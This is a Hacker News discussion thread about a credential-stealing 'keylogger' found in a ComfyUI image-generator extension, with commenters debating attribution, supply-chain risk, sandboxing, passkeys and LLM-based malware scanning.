[HN Gopher] Keylogger discovered in image generator extension
___________________________________________________________________
Keylogger discovered in image generator extension
Author : belladoreai
Score : 234 points
Date : 2024-06-09 17:29 UTC (5 hours ago)
(HTM) web link (old.reddit.com)
(TXT) w3m dump (old.reddit.com)
| LtWorf wrote:
| No domain and website registered?
| skilled wrote:
| Looks like a pretty small project. Only had 40 stars on GitHub
| before the repo was removed.
|
| Was this the main method of GPT4 and Claude integrations for
| ComfyUI?
| belladoreai wrote:
| It was an extension for ComfyUI, which has 37k stars on GitHub.
| The way ComfyUI is commonly used is that a person shares a
| "workflow" file, which utilizes various obscure extensions
| (called "custom nodes") and then the people who want to run the
| workflow on their own computer will install all these obscure
| custom nodes that have like 40 stars on GitHub or so.
| szundi wrote:
| Just like an npm install
| LtWorf wrote:
| Using stars as popularity doesn't work.
|
| I have personally never starred anything that I use. And 90% of
| the open source that I use isn't on github.
| WarOnPrivacy wrote:
| Some entity called Nullbulge Group claims they took over the
| repo.
|
| Today's capture (before the repo got 404'd) has their
| belligerence spiel.
| https://web.archive.org/web/20240609135118/https://github.co...
|
| This is the capture from 3 days prior:
| https://web.archive.org/web/20240525021402/https://github.co...
| belladoreai wrote:
| I have not seen a statement from Nullbulge so it's not
| appropriate to say that they took over the repo.
|
| The author of the repo is claiming that their repo is hacked,
| but this is an obvious lie, because their very first GitHub
| commit is the one where they push the malware. Nobody would
| hack an empty GitHub account.
|
| I don't know if the author of the repo is lying when they say
| that Nullbulge is behind the attack (perhaps the author is part
| of Nullbulge, perhaps not).
| millzlane wrote:
| I wouldn't be so sure no one would hack an idle account. I
| had my Spotify account taken before I even used it. I think
| in my case they used my account to pump up other lesser known
| artists.
| belladoreai wrote:
| Okay, sure. But if we have an account which has never had
| any legitimate activity on it ever - an account that has
| only ever been used to push malware - then I don't know if
| it matters much who is the "rightful owner" of the account.
| Things would be different if the GitHub account had some
| legitimate activity before the "hack".
| millzlane wrote:
| I agree it doesn't matter much. Could be a noob mistake
| by the account owner and this is damage control.
| janoc wrote:
| There was also an actively exploited XSS vulnerability on
| Github in the recent days.
|
| Doesn't mean that this guy was not a malicious actor, only
| that one shouldn't be so quick to cast stones without
| evidence.
| belladoreai wrote:
| The person who created the custom node is the same person
| who "hacked" it. Whether or not the account is
| technically owned by some unrelated civilian is not
| important, because there is no other activity on the
| account.
| zamalek wrote:
| Must be script kiddies. You have the opportunity to deploy
| anything to a machine that almost certainly has a powerful GPU,
| and choose a key logger that exists in signature databases?
| _Genius._
| Stagnant wrote:
| Telegram and discord webhooks are 100% signs of an
| unsophisticated attacker and they are a very common sight in
| malware samples. Github is full of skiddie "info stealer"
| projects that use telegram api / discord webhook to deliver
| the stolen data. They make no sense to use since anybody can
| spam that webhook endpoint. Not 100% sure about discord, but
| at least in the case of telegram anybody can even read and
| download all the data that has been sent to it.
| uyzstvqs wrote:
| Quick search reveals anti-AI motivated script kiddies. Also
| some degen NSFW "art" content on DeviantArt and Reddit by the
| same name, their likely origin.
| 8fingerlouie wrote:
| Something is fishy here.
|
| According to the original report, the "key logger" was in the
| custom wheels in the requirements.txt, but looking at that
| repository there has been only two commits, which according to
| Reddit both had malicious code in them.
|
| Of course, proper discovery would be easier if the GitHub
| account still existed.
| nsingh2 wrote:
| Not surprised at all, ComfyUI extensions are just arbitrary
| python code. The first time I tried ComfyUI extensions I put it
| in a podman container with GPU passthrough and blocked network
| access.
| smarm52 wrote:
| Hopefully this will be just the incentive they need to do
| something safer. Something similar happened before the move
| from PKL to SAFETENSOR for model files.
| Maxious wrote:
| Comfy UI manager recently added some security levels so that by
| default you can't accidentally leave a public instance that
| allows remotely installing arbitrary python code
| https://github.com/ltdrdata/ComfyUI-Manager?tab=readme-ov-fi...
| 14 wrote:
| Is there no way to defend against a keylogger? What can you do if
| a simple keylogger can steal your passwords?
| millzlane wrote:
| Use 2FA I'd imagine.
| Latty wrote:
| Ideally, don't use passwords: Passkeys where supported, SSH
| Keys, client certificates, social login via a service that does
| support one of these methods.
|
| Magic link emails can also work, but are potentially vulnerable
| if you copy/pasted it rather than clicking depending on the
| keylogger's capability and clipboard visibility, although the
| window for attack is small, it's a much more sophisticated
| attack that leaves more traces (good sites will reject reuse).
|
| Second best, also use a second factor: U2F ideally, TOTP with
| the same caveats as magic link emails, and at the bottom of the
| barrel SMS which is better than nothing but known to be very
| flawed.
|
| Honestly, if you are anything other than a casual user, and
| don't have devices with support baked in already, it's crazy
| not to spend ~PS60 on a pair of security keys for passkey/U2F.
| It's not a lot of money and is just _so_ much more secure.
| danieldk wrote:
| _Ideally, don 't use passwords: Passkeys where supported, SSH
| Keys, client certificates, social login via a service that
| does support one of these methods._
|
| If a process has the privileges to run as a keylogger, it can
| also grab your local SSH private keys and possibly harvest
| passwords and passkeys from your local password manager vault
| [1]. The process has local access and since it is a key
| logger presumably your master password. (The complexity
| depends a bit on the password manager, e.g. IIRC macOS
| keychain always requires a roundtrip through the secure
| enclave).
|
| _Honestly, if you are anything other than a casual user, and
| don 't have devices with support baked in already, it's crazy
| not to spend ~PS60 on a pair of security keys for
| passkey/U2F. It's not a lot of money and is just so much more
| secure._
|
| 100% this. A secure enclave or a hardware key is the only way
| to keep your key material safe.
|
| Also, app sandboxing should be the default. macOS App Store
| Apps are sandboxed. Unfortunately, these days the standard is
| still for applications to have unfettered access to a user's
| files.
|
| [1] Passkeys can also be on a security key, but e.g. Yubikeys
| only have a small number of resident key slots and I think
| _passkeys_ to most people means key material synced through
| iCloud /1Password/your favorite cloud.
| Retr0id wrote:
| Aside from not using passwords or using 2FA, sandboxing helps.
|
| A VM with GPU passthrough set up would be one example (although
| this is usually a pain to set up and I expect most people
| aren't doing it).
|
| As a more user-friendly example, if you install an iOS app
| (local-model LLM and image generation apps exist), the
| sandboxing provided by the OS ought to be more than enough to
| prevent keyloggers, short of 0day exploits.
| nsingh2 wrote:
| Not as secure as VMs but GPU passthrough with Docker/Podman
| is much easier to set up, and you can even use the GPU on the
| host machine at the same time.
| creata wrote:
| Are you giving it access to /dev/dri, or doing some fancier
| sandboxing?
|
| (Would you even need anything fancier? I think /dev/dri is
| supposed to isolate users.)
| nsingh2 wrote:
| Nvidia provides a toolkit to do this [1], getting a GPU
| into a container is as easy as running `podman run
| --device nvidia.com/gpu=all`. The process is similar for
| Docker, but rootless Docker requires some extra steps
| IIRC.
|
| [1] https://docs.nvidia.com/datacenter/cloud-
| native/container-to...
| ehsankia wrote:
| "keylogger" may not be the right term here? I'm not familiar
| with how that term is broadly used for, but my definition of
| that term is a tool that logs your keypresses. Here, it seems
| like it was scraping your chrome/firefox data for login
| cookies?
|
| Honestly there's quite a lot of malware that go against those
| files, I wonder if there's a way to require high privilege to
| accessing chrome/firefox appdata, or just block it entirely
| from other apps.
| stuffoverflow wrote:
| Yeah you're right, people miss use the term keylogger
| frequently. These kind of malware are broadly called
| "stealers" and usually do not involve keylogging.
|
| Actual keyloggers tend to be rare nowadays due to them being
| easier to detect and the fact that in general the browser
| data is a more valuable target.
| sureglymop wrote:
| I mean, anything with root access can very easily use libevdev
| to get all keystrokes as well as mouse positions. (It's maybe
| 10 lines of code to do that).
|
| So, don't run stuff as root. If it needs root access, run it in
| a virtual machine (personally I use qubes os for this).
| 42lux wrote:
| That discussion on reddit really is something else so much
| misinformation and pretend knowledge at work. It's as scary as
| the malware.
| SoftTalker wrote:
| And this is the input for AI training.....
| nicce wrote:
| Not just any input, but paid input :-)
| Ukv wrote:
| The user's reddit profile: https://archive.is/G5GIW
|
| They have a couple of other tools hosted on HuggingFace, both
| having the malicious dependencies and both requiring entering API
| keys, namely:
|
| "SillyTavern Character Generator": https://archive.is/gETq3
| (requirements.txt: https://archive.is/xqqtA)
|
| "Image Description with Claude Models and GPT-4 Vision":
| https://archive.is/6Ydgs (requirements.txt:
| https://archive.is/9Sp5C)
|
| They've also posted some BeamNG mods, and were casting doubt on
| accusations that some other account's mod contained malware:
| https://archive.is/zLiaZ
|
| That other account's reddit profile: https://archive.is/r9V1M
| tamimio wrote:
| Lesson for the people who run and execute stuff without looking
| at the code first.
| vvpan wrote:
| Which is everybody in the world except for a handful of people.
| tamimio wrote:
| Not really, and it takes a few minutes because most of these
| packages (including npm) are small. You don't have to read
| the WireGuard codebase because it's reputable enough, but for
| obscure or unknown add-ons/package code, it's on you to
| double-check, just like reading the 'readme'.
| froggertoaster wrote:
| You can't "not really" this away. Most people don't bother
| looking at small package code, much less code for packages
| that are far more complex.
| redserk wrote:
| So just sneak the code in a dependency of a dependency.
|
| Who's diving 3-4 layers deep into dependencies?
| netule wrote:
| No need to hide it inside dependencies, just modify the
| code before building and pushing the package to PyPi.
| bdlowery wrote:
| I haven't looked at the source code of a single npm package
| I've installed in the past 5 years.
|
| "It takes a few minutes"
|
| Dude my web dev projects have like 1,000s of dependencies.
| I'm not going to check the source code of every package
| tailwind requires.
| fbdab103 wrote:
| Even if you did review it, a motivated attacker is not
| going to have an exfiltrate_user_data(). The xz backdoor
| exploit was incredibly sophisticated, and one key of the
| design was sneaking a "." into a single line of a build
| test script.
|
| A cursory audit of primary dependencies has almost zero
| chance of catching anything but a brazen exploit.
| redserk wrote:
| Yeah. Realistically I think the best course of action is
| just assume you're already using a library that can
| exfiltrate data.
|
| This requires allowlisting egress traffic and possibly
| even architecting things to prevent any one library from
| seeing too many things. This approach can be a big pain
| though and could be difficult to implement practically.
| akira2501 wrote:
| This is why I refuse to use almost anything on npm. If you
| have a zero dependency project I'll consider it. If you
| have a dependency that also has a set of dependencies then
| I will never use your code.
| gotbeans wrote:
| Imo this makes no sense. There's zero chance you will start
| inspecting all dependencies even in a relatively small
| application, which now a days could pull already a large
| number of deps.
|
| I don't see how doing any of this manually will help.
| genter wrote:
| Would you have caught the XZ backdoor?
| creata wrote:
| Most people should only download software from people they
| trust (to not be evil and also to be competent).
|
| If you download code off some unknown person's GitHub repo,
| you'd be stupid not to read it very very carefully!
| Geee wrote:
| Ain't nobody got time for that. LLMs should be capable of
| analysing code for anything malicious / suspicious.
| yonixw wrote:
| Since LLM and keyloggers are turing machines, it won't
| happen. (Or more precisely: it won't beat the cat and mouse
| game of obfuscations.)
| kibwen wrote:
| Unfortunately, no, because the existence of LLMs that can
| automatically determine code that is suspicious will be
| offset by the existence of LLMs that can generate malicious
| code that bypasses the detection abilities of the
| aforementioned LLMs.
| CrazyStat wrote:
| Generative Adversarial LLMs, let's go!
| protosam wrote:
| Perhaps we could just call these ALLMs (Adversarial Large
| Language Models). You're already dropping the N in GAN, I
| see no need for the G.
|
| As an end result I think someone clever could make a
| LLaMA pun for the name of a LLaMA based ALLM.
| astromaniak wrote:
| No, they cannot work with large code base, not yet. And have
| very limited talent for logic and debugging. They may improve
| at some point, probably will be hooked up with external
| tools.
| StressedDev wrote:
| Everyone runs code they have not inspected. For example, almost
| no one has read all of the code of in FreeBSD, Linux (kernel),
| MacOS, Open BSD, or Windows. I also doubt people are reading
| all of the code in their favorite Linux distribution.
|
| Even inspecting the code is not enough because a lot of
| security vulnerabilities are not obvious. Basically, security
| is hard, and often there are not a lot of good solutions.
|
| Here are some tricks I have found which have helped me minimize
| my risk:
|
| 1) Use different machines for different purposes. Basically,
| you should not use 1 PC (or Mac) for everything. I have one for
| my finances, one for gaming, and a general-purpose PC. If one
| gets hacked, the others are still fine.
|
| 2) Get software from trustworthy sources. Most of the major
| software companies are not going to ship malicious code. For
| open-source software, use software from popular projects which
| have a good reputation.
|
| 3) Ask yourself why is someone providing this software? Is it
| for money? Are they creating it because they enjoy it? How do
| they support themselves? For example, Google's business model
| is building a dossier on people so it can deliver ads they are
| more likely to click on. When Google gives you something for
| "free", they will probably use it to track you, or track
| visitors to your website.
|
| 4) Support the people who build the software you use. If its
| commercial software, pay for it, do not pirate it. If it's open
| source, donate time or money to the projects you use. Also,
| thank the people who work on the software, and ALWAYS treat
| them with respect.
|
| 5) Avoid pirated software, software from "free" porn web sites,
| etc. People who provide illegal software, or sketchy software
| are probably willing to put back doors in it.
| creata wrote:
| > For open-source software, use software from popular
| projects which have a good reputation.
|
| On this topic, how much should a person trust central
| repositories of well-known operating system distributions
| (e.g. Arch, Debian)? I know only trusted people can upload to
| them, and the only time I've ever heard of malware slipping
| past them was XZ, but I don't know how much care they take.
| uyzstvqs wrote:
| I'm curious if it'd be possible to use a Code LLM to scan GitHub
| repos and detect possible malware hiding in source code.
| ChrisMarshallNY wrote:
| I have a feeling that we'll be seeing some businesses, built,
| around exactly that.
| bdangubic wrote:
| Github? ;)
| tehlike wrote:
| Socket.dev is not built around this but makes use of this.
| pingou wrote:
| I'm afraid a few simple tweaks, especially if the hackers
| themselves have access to the code LLM to try out their code,
| will be sufficient to evade detection.
| nicce wrote:
| Endless race like with Anti-Virus software.
| dmazzoni wrote:
| If such a tool became commonplace, bad actors would just run it
| on their own malware and keep tweaking it until the LLM failed
| to detect it.
| creata wrote:
| Why does there seem to be such a disregard for security in deep
| learning?
|
| There's examples like this post, but also, until recently, almost
| every deep learning model was literally distributed as a pickle
| file.
| wisemang wrote:
| "Security is not my field, I'm a stats guy": a qualitative root
| cause analysis of barriers to adversarial machine learning
| defenses in industry [0]
|
| [0] https://dl.acm.org/doi/abs/10.5555/3620237.3620448
| chx wrote:
| It's not specific to deep learning, practically every industry
| will look at security as a cost just not worth it. When we
| start throwing the CEO into jail instead of making them pay a
| 18.5M fine for losing the data of 41 million customers that's
| when things will change. Until then, it's just the cost of
| doing business.
| dysoco wrote:
| From my outsider perspective, it's a field that moves very
| fast, there seem to be new tools being released every week so:
|
| 1) As the developer if you focus on hardening, you might be too
| late to release.
|
| 2) People downloading shiny new libs/files/programs constantly.
|
| 3) Influx of people not that versed in the basics of computer
| security playing around with local LLM models, image
| generators, etc.
| justinclift wrote:
| That seems like an almost exact duplicate of the NodeJS/NPM
| issues?
|
| Those same points (but the NodeJS/NPM version of them) is a
| lot of why that ecosystem is having security and reputation
| issues as well.
| sys_64738 wrote:
| Isn't this just one of the milestones that'll eventually
| happen? Blind panic due to security always occurs at some
| point. There must be a 'law' defined for this somewhere.
| Seattle3503 wrote:
| How do people feel about using docker to prevent this sort of
| thing? Does it strike the right balance between usability and
| security?
| belladoreai wrote:
| Well, Docker is great for this as long as you're not one of the
| unlucky few whose machine is bricked because of Docker. So,
| mostly yes, I suppose.
| lyu07282 wrote:
| What does that even mean?
| belladoreai wrote:
| "Bricking" is when your electronic device stops working,
| i.e. becomes a brick. Docker is known to occasionally brick
| Windows machines.
| jiggawatts wrote:
| Wait... what!?
|
| This is the first I'm hearing of this. Do you have any
| references?
| justinclift wrote:
| Docker itself doesn't seem to have the best quality control
| for their official releases, so blindly upgrading Docker
| will likely bite you in the ass if you do it for a few
| years. :(
| badrunaway wrote:
| what can be done to stop all this? We need some sort of OS level
| layer to validate these things. If we put a local LLM which
| checks the bytecode of things which are getting installed/running
| for security = will that solve all this? My heart goes out to
| those who must have lost their money due to this.
| creata wrote:
| One basic measure (one part of a solution) would be to split
| Comfy into two parts: the part that does all the work (running
| plugins, generating images) should have access to nothing but
| read-only access to the files it needs, the GPU, and a socket
| to communicate with the other part.
| badrunaway wrote:
| A cleaner API you mean which exposes what is necessary only.
| creata wrote:
| I meant sandbox the less trusted bit.
| KennyBlanken wrote:
| Well, for one, the keylogger is detected by antivirus programs.
|
| I keep coming across various projects whose executables trigger
| antivirus programs, and I think that when those triggers
| happen, "it's fine, don't worry" claims need to be treated with
| more skepticism.
|
| At the same time, antivirus vendors need to stop being so lazy
| and using strings and such that are clearly part of an open
| source program/library for their signatures.
| badrunaway wrote:
| I believe there should be a clear indicator in UI of every OS
| when any new program listens to your keystrokes.. it should
| be the norm
| FileSorter wrote:
| I think this is one of the use cases for a sandboxed WASM
| plugin system.
| creata wrote:
| But almost everyone working on these plugins _really_ wants
| to use Python and PyTorch.
| badrunaway wrote:
| nobody ported python to wasm yet?
| aintnolove wrote:
| I peered down the ComfyUI rabbit hole [1] and it is shockingly
| powerful. Did Adobe drop the ball on image generation? What are
| they doing over there? There has to be a better, more secure way
| to bundle up all this imagegen logic.
|
| [1] https://learn.thinkdiffusion.com/bria-ai-for-background-
| remo...
| belladoreai wrote:
| Yep, it's super powerful.
|
| I would say that the "more secure way" is to just use ComfyUI
| without installing any obscure nodes from unknown developers.
| You can do pretty much anything using just the default nodes
| and the big node packs.
___________________________________________________________________
(page generated 2024-06-09 23:01 UTC)